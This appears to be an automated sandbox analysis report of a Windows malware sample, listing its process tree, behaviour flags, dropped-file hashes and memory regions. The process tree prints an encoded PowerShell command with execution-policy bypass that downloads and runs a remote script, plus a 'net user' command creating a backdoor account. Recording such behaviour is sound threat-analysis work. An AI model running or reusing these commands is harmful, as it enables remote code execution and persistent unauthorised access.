C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1MD5
4d0cb7fa714bb6b8b113319c5f37734d
SHA178fb1052d8fa35592e0f6103378658478c8d1385
SHA256469199f341db97de914a24f626d2f1ea8fe116bd6302bb10e53a027e759e7845
SHA512b2e7d6f724990ea57448429f159c713b2885354c709e206a97126b470e9705143e2695a3bd73ee3f55a160f2807f4ac215dca9df0da209bf88503069d52cd76c
-
C:\Users\Admin\AppData\Local\Temp\RESFD03.tmpMD5
d548bfd3e9739e99cea9a091caa3f42a
SHA112d057dd4af7393c06c303f56c76ed253f35d17d
SHA256cd729a85d094c21960d12d9df5a99de7d60217b557bb22acc44911caac56e2f1
SHA5121acb0a3ec81cc58f8f66f91711fd1bfdf1786d1e8c49541c5600de76db56ffb5471d3c82efdcd95e1a938b5c0693f4a71ff997ac4f6b61fbae58999224ddc889
-
C:\Users\Admin\AppData\Local\Temp\b2EP0a91ph.exeMD5
c2ac724339045f253306ae9ab38cbf4f
SHA1c6abd5edb40444ce3fbc8564051545161cd85495
SHA256d626090ca79fc0a3494f3f89148180beb850299ce7cae9f115753d5c04afbc6a
SHA512b7f0e175f0112a95536a50790c73796dda160cdeb58f6d09481e3515232a774c1da2a2eaed47e9dfe0287213e794e26553358c1c45c1a8177f50c3269f2fde58
-
C:\Users\Admin\AppData\Local\Temp\b2EP0a91ph.exeMD5
c2ac724339045f253306ae9ab38cbf4f
SHA1c6abd5edb40444ce3fbc8564051545161cd85495
SHA256d626090ca79fc0a3494f3f89148180beb850299ce7cae9f115753d5c04afbc6a
SHA512b7f0e175f0112a95536a50790c73796dda160cdeb58f6d09481e3515232a774c1da2a2eaed47e9dfe0287213e794e26553358c1c45c1a8177f50c3269f2fde58
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
065cc96fec70546c9f195f703e4d657b
SHA19da24636d8fd3de61f46ff7282640d3fa27d6b45
SHA256cc7097fa515dfc07033464b5e71ba0172f440bd4043ec1c7c48c6ce4f18e3bc3
SHA512a2fefe055067d832736c109d1ea50921bfc9275bb6fe11e57f4245cac52e1758b9b2d7fe893ece0fe5101b3cb5a1229011b8e517fe31de5202c4a7f0fa39aec0
-
C:\Users\Admin\AppData\Local\Temp\wqatwvkc\wqatwvkc.dllMD5
227ab471b2d31d2af7de9d70aa15d027
SHA1b8569d95971ddd569ff27d838a7f14cea477c908
SHA256d800dce46bcbfe4b2732c66b5eebc860fcef509041e45aa9d937e703944f6a7c
SHA51260c19485a2f8770fbb29370743b1c9ac7933455a40fb6a8780db178bfb7083e867d69962330a24af9f4b8891154503995d11b04f187d1b84965f63a9f66f5ded
-
\??\c:\Users\Admin\AppData\Local\Temp\wqatwvkc\CSC446953FD1A4041BE8C3F48E23DEBDDFA.TMPMD5
ff2547bdc497773394e21ad1fe844162
SHA10811f0922ad0bfdfd7313569ab51905f95b49132
SHA256462a98360f3f98877baae4a312e9dcab0a65da267983765ae772c9391b69dc2f
SHA512605b39add9ebf60e1d23bd1c9b7988cef9a430e0b7d3f0fb2618444bbf7d1f59ed5fd99dd7ce25354eabe4186e99cd4197ed594a1069616cf490233fb19e6eab
-
\??\c:\Users\Admin\AppData\Local\Temp\wqatwvkc\wqatwvkc.0.csMD5
df390bc8a088b51d27253fed32186361
SHA169e6a59300fc04ef5ab53cbe061b8b2aefe375a4
SHA2564388b3b4aaccededcd9a2d864ba85967c08a4586dee2745e5539e12cb4de5c5f
SHA5124d0d050afd8809b9090e0ac8ab4f00ad4237723bfa8adb2f605fbbdd6be532bd941bccf79b7fbc0d226bc7890c2011dd18b0263af5b81911e1c8def2d9f235c8
-
\??\c:\Users\Admin\AppData\Local\Temp\wqatwvkc\wqatwvkc.cmdlineMD5
1acc5bab4f01fe9396df6ee8c927fb72
SHA18da892ff5638288c7aec033edf07974b7cded80d
SHA256ea3dc9cf6655cedcb38ab28f2a909003052168df56bf63c17671beb9fd660c07
SHA512cfff0d78c23de2ca39f605fbb1cb52dcbe0cc9ed6ed8a1ec58667f9ed0bc73cd94e575a320c6260b93df573740b993ba85b64b99931a82fc283080822c182d68
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
\Windows\Branding\mediasrv.pngMD5
ee8186ae8d2615ee4a859007556227ec
SHA10125a0caaf2ff3da1266f1893cf051ddca6460fa
SHA25696de9d90945d198cd5aed4a446e464ba13e2e4e92d3649a396825864a0fcd17f
SHA5122eebacfc81b1c974583c41f44b7726e8280098d1f371db7d7038d24bdf3724093f1fe1c0c7eff5e8d9053cd98add7882734ea0746c8b20621e67e1b06442d612
-
\Windows\Branding\mediasvc.pngMD5
7a8bf878d6438e28822cb499cb7da107
SHA136cbc7c1b2da094b773614d251704e4c2bb0e88e
SHA2569aae34a03f16047b5e795b0dcd9b717f87c54355a9928889f629f3bb06bd7e63
SHA5126c19a44f8c4251cd14c35862108a4fed4875386a5eec9763ce78679beedc0bd157560eb5a3b11209a5b4336b923133a6bf9f8f657f116744077967d6af6654ee
-
memory/544-228-0x0000000000000000-mapping.dmp
-
memory/808-230-0x0000000000000000-mapping.dmp
-
memory/808-114-0x0000000002230000-0x00000000022C1000-memory.dmpFilesize
580KB
-
memory/808-115-0x0000000000400000-0x0000000000496000-memory.dmpFilesize
600KB
-
memory/812-246-0x0000000000000000-mapping.dmp
-
memory/812-254-0x0000000000000000-mapping.dmp
-
memory/1148-174-0x000001A6F3C63000-0x000001A6F3C65000-memory.dmpFilesize
8KB
-
memory/1148-173-0x000001A6F3C60000-0x000001A6F3C62000-memory.dmpFilesize
8KB
-
memory/1148-168-0x0000000000000000-mapping.dmp
-
memory/1148-204-0x000001A6F3C66000-0x000001A6F3C68000-memory.dmpFilesize
8KB
-
memory/1148-208-0x000001A6F3C68000-0x000001A6F3C6A000-memory.dmpFilesize
8KB
-
memory/1204-241-0x0000000000000000-mapping.dmp
-
memory/1204-257-0x0000000000000000-mapping.dmp
-
memory/1504-219-0x0000000000000000-mapping.dmp
-
memory/1972-122-0x00000191F1EA0000-0x00000191F22C1000-memory.dmpFilesize
4.1MB
-
memory/1972-117-0x0000000000000000-mapping.dmp
-
memory/1972-124-0x00000191F1A60000-0x00000191F1A62000-memory.dmpFilesize
8KB
-
memory/1972-125-0x00000191F1A63000-0x00000191F1A65000-memory.dmpFilesize
8KB
-
memory/1972-126-0x00000191F1A65000-0x00000191F1A66000-memory.dmpFilesize
4KB
-
memory/1972-127-0x00000191F1A66000-0x00000191F1A67000-memory.dmpFilesize
4KB
-
memory/2016-235-0x0000000000000000-mapping.dmp
-
memory/2052-138-0x000001E9FB7E0000-0x000001E9FB7E2000-memory.dmpFilesize
8KB
-
memory/2052-154-0x000001E9FB600000-0x000001E9FB601000-memory.dmpFilesize
4KB
-
memory/2052-139-0x000001E9FB7E3000-0x000001E9FB7E5000-memory.dmpFilesize
8KB
-
memory/2052-160-0x000001E9FC790000-0x000001E9FC791000-memory.dmpFilesize
4KB
-
memory/2052-218-0x000001E9FB7E8000-0x000001E9FB7E9000-memory.dmpFilesize
4KB
-
memory/2052-128-0x0000000000000000-mapping.dmp
-
memory/2052-137-0x000001E9FC180000-0x000001E9FC181000-memory.dmpFilesize
4KB
-
memory/2052-147-0x000001E9FB7E6000-0x000001E9FB7E8000-memory.dmpFilesize
8KB
-
memory/2052-134-0x000001E9FB470000-0x000001E9FB471000-memory.dmpFilesize
4KB
-
memory/2052-161-0x000001E9FCB20000-0x000001E9FCB21000-memory.dmpFilesize
4KB
-
memory/2076-220-0x0000000000000000-mapping.dmp
-
memory/2252-226-0x0000000000000000-mapping.dmp
-
memory/2268-247-0x0000000000000000-mapping.dmp
-
memory/2268-243-0x0000000000000000-mapping.dmp
-
memory/2272-121-0x0000000000000000-mapping.dmp
-
memory/2272-237-0x0000000000000000-mapping.dmp
-
memory/2276-248-0x0000000000000000-mapping.dmp
-
memory/2284-222-0x0000000000000000-mapping.dmp
-
memory/2620-231-0x0000000000000000-mapping.dmp
-
memory/2680-223-0x0000000000000000-mapping.dmp
-
memory/2700-227-0x0000000000000000-mapping.dmp
-
memory/2768-240-0x0000000000000000-mapping.dmp
-
memory/2884-239-0x0000000000000000-mapping.dmp
-
memory/2940-221-0x0000000000000000-mapping.dmp
-
memory/3100-209-0x000001B7F2BF0000-0x000001B7F2BF2000-memory.dmpFilesize
8KB
-
memory/3100-207-0x0000000000000000-mapping.dmp
-
memory/3100-210-0x000001B7F2BF3000-0x000001B7F2BF5000-memory.dmpFilesize
8KB
-
memory/3100-213-0x000001B7F2BF8000-0x000001B7F2BFA000-memory.dmpFilesize
8KB
-
memory/3100-212-0x000001B7F2BF6000-0x000001B7F2BF8000-memory.dmpFilesize
8KB
-
memory/3144-225-0x0000000000000000-mapping.dmp
-
memory/3156-244-0x0000000000000000-mapping.dmp
-
memory/3240-224-0x0000000000000000-mapping.dmp
-
memory/3240-146-0x0000000000000000-mapping.dmp
-
memory/3272-229-0x0000000000000000-mapping.dmp
-
memory/3348-215-0x0000022DBEFF3000-0x0000022DBEFF5000-memory.dmpFilesize
8KB
-
memory/3348-211-0x0000000000000000-mapping.dmp
-
memory/3348-214-0x0000022DBEFF0000-0x0000022DBEFF2000-memory.dmpFilesize
8KB
-
memory/3348-216-0x0000022DBEFF6000-0x0000022DBEFF8000-memory.dmpFilesize
8KB
-
memory/3348-217-0x0000022DBEFF8000-0x0000022DBEFFA000-memory.dmpFilesize
8KB
-
memory/3352-255-0x0000000000000000-mapping.dmp
-
memory/3364-120-0x0000000000000000-mapping.dmp
-
memory/3432-238-0x0000000000000000-mapping.dmp
-
memory/3500-242-0x0000000000000000-mapping.dmp
-
memory/3588-245-0x0000000000000000-mapping.dmp
-
memory/3660-234-0x0000000000000000-mapping.dmp
-
memory/3708-150-0x0000000000000000-mapping.dmp
-
memory/3708-236-0x0000000000000000-mapping.dmp
-
memory/3708-256-0x0000000000000000-mapping.dmp
-
memory/3992-251-0x000001A4FAC63000-0x000001A4FAC65000-memory.dmpFilesize
8KB
-
memory/3992-253-0x000001A4FAC68000-0x000001A4FAC69000-memory.dmpFilesize
4KB
-
memory/3992-252-0x000001A4FAC66000-0x000001A4FAC68000-memory.dmpFilesize
8KB
-
memory/3992-250-0x000001A4FAC60000-0x000001A4FAC62000-memory.dmpFilesize
8KB
-
memory/3992-249-0x0000000000000000-mapping.dmp